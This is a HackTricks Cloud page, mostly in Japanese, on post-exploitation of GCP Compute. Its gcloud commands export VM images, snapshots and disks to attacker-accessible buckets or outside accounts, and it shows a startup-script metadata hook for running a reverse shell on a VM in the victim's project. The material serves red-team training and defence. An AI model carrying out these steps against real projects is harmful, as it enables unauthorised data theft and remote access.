GCP - Compute Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Compute

ComputeとVPC（ネットワーキング）に関する詳細情報は、以下を確認してください：

GCP - Compute Enum

画像をローカルにエクスポートおよび検査する

これにより、攻撃者は既存の画像に含まれるデータにアクセスしたり、実行中のVMの新しい画像を作成して、そのデータにアクセスすることができます。実行中のVMにアクセスすることなく。

VM画像をバケットにエクスポートし、その後ダウンロードしてローカルにマウントすることが可能です。

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

このアクションを実行するには、攻撃者はストレージバケットに対する権限が必要であり、確実にcloudbuildに対する権限が必要です。これはサービスであり、エクスポートを実行するように求められます。さらに、これが機能するためには、codebuild SAとcompute SAが特権的な権限を持っている必要があります。 cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com は以下の権限が必要です：

roles/iam.serviceAccountTokenCreator
roles/compute.admin
roles/iam.serviceAccountUser

そして、SA <project-id>-compute@developer.gserviceaccount.com は以下の権限が必要です：

roles/compute.storageAdmin
roles/storage.objectAdmin

スナップショットとディスクをローカルにエクスポートおよび検査する

スナップショットとディスクを直接エクスポートすることはできませんが、スナップショットをディスクに変換し、ディスクをイメージに変換することは可能であり、前のセクションに従って、そのイメージをエクスポートしてローカルで検査することができます。

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

VMを作成してイメージを検査する

攻撃者がイメージを作成した場所からイメージに保存されたデータや実行中のVMにアクセスすることを目的として、外部アカウントにイメージへのアクセスを付与することが可能です:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

そして、それから新しいVMを作成します：

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

もし画像に対して外部アカウントのアクセスを与えられなかった場合、被害者のプロジェクトでその画像を使用してVMを起動し、メタデータにリバースシェルを実行させることで、パラメータを追加して画像にアクセスすることができます:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

スナップショット/ディスクをVMにアタッチして検査する

ディスクまたはスナップショットに保存されたデータにアクセスすることを目的として、スナップショットをディスクに変換し、ディスクをイメージに変換し、前の手順に従うことができます。

または、外部アカウントにディスクへのアクセスを付与することができます（出発点がスナップショットの場合は、スナップショットへのアクセスを付与するか、そこからディスクを作成します）：

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

インスタンスにディスクをアタッチする:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

ディスクをVM内にマウントする:

VMにSSH接続する:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]

ディスクを特定する: VM内に入ったら、ディスクデバイスをリストして新しいディスクを特定します。通常、/dev/sdb、/dev/sdcなどとして見つけることができます。
ディスクをフォーマットしてマウントする（新しいまたは生のディスクの場合）:

マウントポイントを作成する:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]

ディスクをマウントする:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

もしスナップショットやディスクに外部プロジェクトへのアクセスを与えることができない場合、スナップショット/ディスクと同じプロジェクト内のインスタンスでこれらの操作を実行する必要があるかもしれません。

HackTricksをサポートする

サブスクリプションプランを確認してください!
**💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksとHackTricks CloudのgithubリポジトリにPRを提出してください。

PreviousGCP - Cloud SQL Post Exploitation NextGCP - Filestore Post Exploitation

Last updated 3 days ago